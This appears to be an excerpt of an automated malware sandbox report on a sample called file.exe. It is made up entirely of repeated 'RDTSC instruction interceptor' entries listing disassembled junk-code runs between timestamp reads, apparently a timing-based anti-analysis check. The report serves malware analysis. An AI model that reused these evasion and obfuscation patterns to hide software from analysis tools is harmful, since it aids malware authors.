                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C09E second address: 69C0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79113F07A9h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0C2 second address: 69C0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0C8 second address: 69C0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F79113F07A2h 0x0000000b jmp 00007F79113F07A6h 0x00000010 pushad 0x00000011 je 00007F79113F0796h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0FE second address: 69C104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C25F second address: 69C263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C263 second address: 69C274 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C274 second address: 69C27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C27D second address: 69C281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C437 second address: 69C451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79113F07A1h 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C6C1 second address: 69C6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C815 second address: 69C819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7A90 second address: 6A7A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7A96 second address: 6A7A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7C0E second address: 6A7C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7C12 second address: 6A7C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7C18 second address: 6A7C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7C1E second address: 6A7C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F79113F0796h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7C2A second address: 6A7C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F03h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F79111F4F02h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F79111F4EFBh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7C64 second address: 6A7C88 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F79113F0796h 0x00000009 jmp 00007F79113F07A6h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7C88 second address: 6A7C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7F92 second address: 6A7F9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A80E8 second address: 6A80FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F79111F4EF6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A80FE second address: 6A811E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F79113F07A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A811E second address: 6A8124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8124 second address: 6A8133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jbe 00007F79113F079Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8283 second address: 6A8297 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79111F4EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F79111F4EF8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A858A second address: 6A858E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8709 second address: 6A870E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A9081 second address: 6A9087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7584 second address: 6A7593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F79111F4EF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7593 second address: 6A759B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A759B second address: 6A75A5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79111F4EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A75A5 second address: 6A75C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F79113F07A4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1A3C second address: 6B1A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1407 second address: 6B140F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B140F second address: 6B1423 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79111F4EFAh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F79111F4EF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B15C9 second address: 6B15CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B171D second address: 6B1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE6D second address: 6BEE86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79113F07A1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEE86 second address: 6BEEA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F79111F4F07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1ABF second address: 6D1AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1AC5 second address: 6D1ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9255 second address: 6D9261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F79113F0796h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9261 second address: 6D9265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9265 second address: 6D926F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F0796h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D969A second address: 6D96B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F05h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D996B second address: 6D996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D996F second address: 6D9973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9973 second address: 6D99A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F79113F079Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F79113F07A5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C46 second address: 6D9C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F79111F4EF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C62 second address: 6D9C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C66 second address: 6D9C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9C70 second address: 6D9C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA6F7 second address: 6DA702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA702 second address: 6DA706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFB26 second address: 6DFB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFB2A second address: 6DFB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F79113F07A7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DFB4D second address: 6DFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF6DB second address: 6DF6E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF6E1 second address: 6DF6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF84B second address: 6DF86F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F79113F0796h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F79113F07A4h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9381 second address: 6E9395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4EFEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9395 second address: 6E939C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC526 second address: 6EC52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC52A second address: 6EC530 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC530 second address: 6EC540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jo 00007F79111F4EF6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07F0 second address: 5F07FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07FB second address: 5F07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07FF second address: 5F0803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F0803 second address: 5F0826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F79111F4F09h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8CAB second address: 6F8CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1E9 second address: 6FC204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F07h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC204 second address: 6FC234 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F79113F07A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F79113F079Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79113F079Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC0A4 second address: 6FC0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC0A8 second address: 6FC0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F79113F0796h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC0B4 second address: 6FC0BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702032 second address: 702037 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700E80 second address: 700E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700FF5 second address: 701024 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F79113F079Eh 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007F79113F0796h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701024 second address: 701041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F09h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70118E second address: 701194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701719 second address: 70171D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70171D second address: 70174D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F79113F07A0h 0x0000000c jmp 00007F79113F07A8h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70174D second address: 701753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701753 second address: 701757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701A78 second address: 701A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701A7E second address: 701A8D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79113F0796h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701D6B second address: 701D70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701D70 second address: 701DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F79113F079Bh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F79113F07A0h 0x00000014 pop ecx 0x00000015 jmp 00007F79113F079Fh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7067CB second address: 7067DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jl 00007F79111F4EFCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7067DA second address: 7067E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7067E2 second address: 706816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, 73A2E475h 0x0000000d mov dword ptr [ebp+122D3855h], ebx 0x00000013 push 00000004h 0x00000015 sub dword ptr [ebp+1245768Bh], edx 0x0000001b call 00007F79111F4EF9h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jc 00007F79111F4EF6h 0x00000029 jno 00007F79111F4EF6h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706816 second address: 70682B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B13 second address: 706B1D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B1D second address: 706B4B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b je 00007F79113F0799h 0x00000011 mov dx, ax 0x00000014 and dh, FFFFFFD4h 0x00000017 push dword ptr [ebp+122D1AFAh] 0x0000001d mov dl, A2h 0x0000001f call 00007F79113F0799h 0x00000024 push esi 0x00000025 pushad 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B4B second address: 706B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jnp 00007F79111F4EFEh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F79111F4EFDh 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B81 second address: 706B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79113F07A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706B96 second address: 706BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F79111F4EF8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709E37 second address: 709E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709E3B second address: 709E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709976 second address: 70997C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
